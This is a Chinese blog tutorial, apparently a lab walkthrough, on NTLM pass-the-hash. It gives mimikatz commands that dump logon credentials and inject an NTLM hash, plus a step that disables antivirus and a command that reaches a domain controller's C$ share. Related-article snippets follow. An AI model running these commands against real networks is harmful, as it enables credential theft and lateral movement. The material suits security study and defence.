内网渗透(哈希传递)

最新推荐文章于 2025-03-17 19:26:29 发布
最新推荐文章于 2025-03-17 19:26:29 发布
阅读量1.2k 收藏 24
点赞数 21
文章标签: 哈希算法 网络 算法
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/xy_wjyjw/article/details/134676851
版权

概念

早期SMB协议明文在网络上传输数据,后来诞生了LM验证机制,LM机制由于过于简单,微软提出了WindowsNT挑战/响应机制,这就是NTLM。

哈希传递前提

同密码(攻击主机与实现主机两台要密码一致)。

NTLM协议

加密ntlm哈希

转换成16进制——转换成加密——转换成MD4

image-20231128092813236

NTLM协议:用于远程登录。例如 22

原理

  1. client(win10)将账户名(test)传给server。
  2. 在server中判断本地账户名(test)是否存在,没有就失败,有的话生成challenge(随机生成的),查找user对应的NTLM哈希(在sam里找),使用哈希加密challenge,生成一个net-ntlm hash存在内存中,将challenge发送给client(win10)。
  3. client(win10)接受到challenge以后,将自己的密码转换成NTLM哈希,用生成的哈希加密challenge生成response,将response发送给server。
  4. server对比自己内存中的net-ntlm hash与client(win10)发来的response是否一致。

image-20231128103710255

哈希传递攻击

哈希传递攻击的前提

  • 首先是管理员,必须提前从不同用户变成管理员
  • 需要用户名和ntml哈希值
  • 如果对方主机在域内,就使用域名;如果不在域内,就使用工作组环境的攻击方式

什么情况下会用哈希传递攻击

  • 攻陷一台主机以后,抓不到该主机用户的明文密码
  • 失陷主机和局域网内存在相同密码

哈希传递攻击

工具:mimikatz

环境:域控(server 2008)、客户机(win 7)

网段:在同一网段,都为NAT模式

域控(server)

  • 静态IP:10.1.1.1

在server中查看445是否开放

image-20231128101209454

  • 查看域控C盘

image-20231128200621745

  • 共享C盘(在cmd中输入命令net share

image-20231128204722954

客户端开始攻击(win7)

  • IP:10.1.1.2

  • 关闭杀毒软件

用mimikatz64位工具,必须是system权限

image-20231128201649767

在打开cmd命令解释器必须以管理员身份运行(因为要用到mimikatz工具)

image-20231128201723269

进入mimikatz.exe

image-20231128202127467

攻击利用

  • 提升权限(注:需以管理员权限运行)
privilege::debug

image-20231128203351700

  • 获取内存中保存的登录信息
sekurlsa::logonpasswords

image-20231128203539731

  • 并抓到自己用户的哈希值(NTLM)

image-20231128203703522

  • 进行哈希攻击
sekurlsa::pth /user:administrator /domain:xiusafe.com /ntlm:32ed87bdb5fdc5e9cba88547376818d4  #pth是哈希传递,domain后面跟的是域

image-20231128205345577

  • 同时弹出一个新的cmd窗口

image-20231128205433846

此时哈希值已经准备好,但还未攻击

开始攻击

  • 查看域控(server)C盘
dir \\10.1.1.1\c$

image-20231128205229403

  • 与域控C盘进行对比

image-20231128200621745

  • 攻击成功

总结

哈希传递攻击是由于局域网内有多台主机存在相同密码造成的,绕过ntlm认证。

西柠!
关注
内网渗透-Hash传递攻击
lza20001103的博客
10-01 1760
Hash传递攻击 文章目录Hash传递攻击前言psexec模块 前言 今天给大家讲解一个知识点,Hash传递攻击,它是在不知道明文密码,只知道hash值的时候进行攻击的一种手段,会返回一个会话,且是system权限,但会遇到uac的问题,我们只要关闭uac就可以了。 psexec模块 利用的前提是必须开放445端口 首先,我们需要获得用户的hash值 在kali中,不知道为什么hash值获取不了,我们cs上线来获取hash值 Administrator的hash值如下: aad3b435b51404eea
内网横向渗透之各种传递攻击
技术超强的网络安全平台
05-06 2416
内网横向渗透之各种传递攻击 前言 在前面一篇文章已经对内网信息收集做了详细介绍,所需要的内网环境也包含在那篇文章中,接下来将以前期内网信息收集到的信息为基础介绍各种明文或hash传递攻击进行横向渗透。 横向渗透 在拿下一台内网主机后,利用既有的资源尝试获取更多的凭据、更高的权限,一步一步拿下更多的主机,进而达到控制整个内网、获取到最高权限、发动高级持续性威胁攻击的目的。我们掌握的方法越多,可能拿到的主机权限的机会就越大。 利用PsExec工具进行横向渗透 PsExec 最强大的功能之一是在远程系统和远程支持
内网渗透——哈希传递
来日可期的博客
10-09 1657
哈希传递攻击(Pass The Hash)是基于 NTLM 认证缺陷的一种攻击方式,攻击者可以利用用户的密码哈希值来进行 NTLM 认证。在域环境中,大量计算机在安装时会使用相同的本地管理员账号和密码。如果计算机的本地管理员账号密码相同,攻击者就能使用哈希传递攻击的手段登录到内网中的其他计算机。
内网渗透哈希传递
weixin_58954236的博客
10-09 538
哈希传递(Pass The。
渗透哈希传递攻击(PTH)学习
最新发布
2401_88083440的博客
03-17 1172
(1)Pass-The-Hash 是一种针对身份认证机制的横向移动技术。(2)横向移动:在入侵多个系统后,通过内部网络或协议漏洞,在多台主机之间跳跃以扩大攻击范围。(3)攻击者无需破解用户密码的明文,只需获取密码的哈希值,就可以利用该哈希值模拟用户身份,访问网络中的其他系统或服务。到这里,横向移动技术了解了,首先我就有下面几点疑问:1.密码的哈希值如何窃取?2.为什么只需要哈希值就可以模拟用户的身份?后面关键就围绕这些来展开,现在再来了解一下攻击原理(注,是攻击原理,而非窃取哈希
内网渗透-哈希传递
qq_45953122的博客
10-18 553
哈希传递是能够在不需要账号明文密码的情况下完成认证的一个技术,比如NTLM Hash、LM Hash都不需要明文密码,因此都可以被称为Hash传递攻击。
哈希传递攻击
总有人间一两风,填我十万八千梦
05-05 1689
​ 目标计算机间如果开启了默认共享又关闭了防火墙,我们如果知道它的用户名和密码,则可以进行ipc$连接。其原理是基于ntlm网络认证。但是ipc$连接需要明文的密码,假如我们只获取了密码的hash值解不出明文,该怎么连接了?此时我们可以进行hash传递(Pass-the-Hash),即输入账号和hash值,进行连接 ​
PTH哈希传递攻击
zhuge_long的专栏
08-31 937
在使用 NTLM 身份验证的系统或服务上,用户密码永远不会以明文形式通过网络发送。Windows 上的应用程序要求用户提供明文密码,然后调用 LsaLogonUser 类的 API,将该密码转换为一个或两个哈希值(LM或NTLM hash),然后将其发送到远程服务器进行 NTLM 身份验证。由于这种机制,我们只需要哈希值即可成功完成网络身份验证,而不需要明文密码。于是当我们获取到任意用户的 Hash 值就可以针对远程系统进行身份验证并模拟该用户,从而获取用户权限。
内网渗透哈希传递攻击
zzlx123的博客
12-18 1953
条件:获取到了某台主机的Administrator用户的LM-Hash和 NTLM-Hash ,并且该主机的445端口打开着,可利用 exploit/windows/smb/psexec 漏洞用MSF进行远程登录(哈希传递攻击)(只能是administrator用户的LM-hash和NTLM-hash),这个利用跟工作组环境或者域环境无关。 这个网站提供对密码转换成 LM-Hash 和 NTLM...
渗透测试笔记】之【内网渗透——横向移动:使用mimikatz和CS进行哈希传递攻击】_cs 如何使用mimikatz
2401_84970989的博客
05-13 294
右键被控主机 —> Access —> Run Mimikatz。右键被控主机 —> Access —> Dump Hashes。
横向渗透哈希传递(PTH)
qq_46258964的博客
05-08 2141
哈希传递PTH PTH,即Pass The Hash,通过找到与账号相关的密码散列值(通常是NTLM Hash)来进行攻击。 在域环境中,用户登录计算机时使用的大都是域账号,大量计算机在安装时会使用相同的本地管理员账号和密码。 因此,如果计算机的本地管理员账号和密码也是相同的,攻击者就可以使用哈希传递的方法登录到内网主机的其他计算机。 kb2871997,禁止了本地管理员进行远程连接,从而组织了管理员权限执行wmi,psexec等危险命令, 但是这个补丁不知道为什么漏了一个默认(user SID=500)本
pth(pass the hash)哈希传递攻击
http://www.gov.cn/xinwen/2016-11/07/content_5129723.htm
10-09 3114
pth(pass-the-hash)哈希传递攻击在内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过LM Hash和NTLM Hash访问远程主机或服务,而不用提供明文密码域/工作组环境账号hash内网中存在和当前机器相同的密码(ps:微软打了KB22871997补丁后只有Administrator(SID 500)可以PTH成功,默认windows server 2012后都会存在补丁)
内网渗透 - 哈希传递攻击
LuckySec
06-06 2668
内网渗透过程中,当获取到某个管理员用户的密码 hash 值却无法解密时,可以通过哈希传递攻击(Pass The Hash)对内网其他机器进行横向渗透哈希传递攻击(Pass The Hash)是基于 NTLM 认证缺陷的一种攻击方式,攻击者可以利用用户的密码哈希值来进行 NTLM 认证。在域环境中,大量计算机在安装时会使用相同的本地管理员账号和密码。如果计算机的本地管理员账号密码相同,攻击者就能使用哈希传递攻击的手段登录到内网中的其他计算机。通过哈希传递攻击,攻击者不需要花时间破解密码哈希值来获取明文密码
渗透之Hash传递攻击
weixin_65550121的博客
12-08 1188
哈希传递(pth)攻击是指攻击者可以通过捕获密码的hash值(对应着密码的值),然后简单地将其传递来进行身份验证,以此来横向访问其他网络系统。攻击者无须通过解密hash值来获取明文密码。因为对于每个Session hash值都是固定的,除非密码被修改了(需要刷新缓存才能生效),所以pth可以利用身份验证协议来进行攻击。攻击者通常通过抓取系统的活动内存和其他技术来获取哈希。虽然哈希传递攻击可以在Linux,Unix和其他平台上发生,但它们在windows系统上最普遍。
渗透测试的域渗透哈希传递攻击PTH
没有网络安全就没有国家安全
03-13 1175
渗透测试的域渗透哈希传递攻击PTH
Windows 哈希传递攻击:深度剖析与防范指南
m0_57836225的博客
10-11 972
在域环境下进行登录操作时,用户需要输入密码以及对应的域名。客户端首先会对用户输入的密码进行哈希计算,并将其暂存于本地。随后,客户端将用户名以明文形式传输至域控制器(预控服务器)。预控服务器会随即生成一个随机的挑战码并发送给客户端。客户端在接收到挑战码后,会把之前计算得出的密码哈希与挑战码、用户名整合在一起,再次发送给服务器,服务器接着将其转交给预控服务器进行验证。预控服务器根据接收到的信息,在活动目录中查询与该用户名对应的密码哈希,然后使用自己存储的密码哈希对挑战码进行加密。
c++ 哈希_传递哈希攻击的原理介绍
weixin_39970064的博客
11-23 318
渗透测试期间,为了提高审核员对信息系统的权限,很多人都会选择横向移动方法。在这种情况下,称为Pass The Hash(传递哈希)的技术被广泛应用,使审核员成为计算机上的管理员。HTLM协议NTLM协议是在Microsoft环境中使用的一种身份验证协议,特别是,它允许用户向服务器证明自己是谁,以便使用该服务器提供的服务。注意:在本文中,术语“服务器”是在客户端/服务器意义上使用的,“服...
内网横向渗透流量特征
01-14
### 内网横向渗透攻击的网络流量特征 在网络环境中,内网横向移动是指攻击者在成功入侵一个内部主机后,在同一网络内的其他计算机之间传播的行为。这种行为通常伴随着特定类型的网络活动模式。 #### SMB协议异常使用 由于许多横向移动依赖于Windows操作系统中的服务消息块(SMB)协议来访问文件共享和其他资源,因此频繁或不寻常的SMB请求可能表明存在潜在的风险。例如,当`CrackMapExec`这样的工具被用来扫描整个域环境时,它会通过发送大量的SMB连接尝试到不同的IP地址来进行枚举操作[^2]。 #### 远程执行命令和服务控制管理器(RPC/SCM) 攻击者可能会利用远程过程调用(RPC)接口以及服务控制管理器(SCM),这些都可能导致非标准端口上的通信增加,尤其是TCP 135, 445等端口。此外,如果观察到了来自已知合法进程之外的新建计划任务或者启动的服务实例,则应引起注意。 #### DNS查询激增 为了发现更多可攻破的目标机器,恶意软件常常会对域名服务器(DNS)发起大量查询请求以获取有关目标系统的更多信息。这可以表现为短时间内DNS日志中出现了过多关于未授权子网范围内的名称解析记录。 #### 非法凭证传递(PtH/PtT) Pass-the-Hash (PtH) 和 Pass-the-Ticket (PtT) 技术允许攻击者无需知道明文密码即可冒充用户身份登录并获得权限。这类事件会在认证过程中留下痕迹,比如Kerberos票据授予票证(TGT)分发次数增多或是NTLM哈希验证失败率上升等情况。 --- ### 安全防护措施 对于上述提到的各种流量特点所对应的防御方法如下: #### 实施严格的最小特权原则 确保所有账户只拥有完成其工作所需的最低限度权利,并定期审查和调整权限设置。这样即使某个节点遭到破坏,也能减少进一步扩散的可能性。 #### 加强监控与检测机制 部署先进的EDR(Endpoint Detection and Response)/XDR扩展型威胁响应平台,它们能够实时监测可疑行为并对异常情况进行告警;同时配合SIEM系统收集多源数据进行关联分析找出隐藏较深的日志线索。 #### 更新补丁及时修复漏洞 保持操作系统及相关应用程序处于最新状态非常重要,因为很多横向移动都是基于已公开但尚未修补的安全缺陷展开的。组织应该建立有效的补丁管理系统,快速响应新发布的安全更新。 #### 教育员工提高意识水平 最后也是最容易忽视的一环就是人的因素——培训工作人员识别钓鱼邮件、社会工程学陷阱以及其他形式的社会欺骗手段,从而降低人为失误带来的风险敞口。 ```bash # 使用防火墙规则限制不必要的外部连接 sudo iptables -A OUTPUT -p tcp --dport 445 -j DROP ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值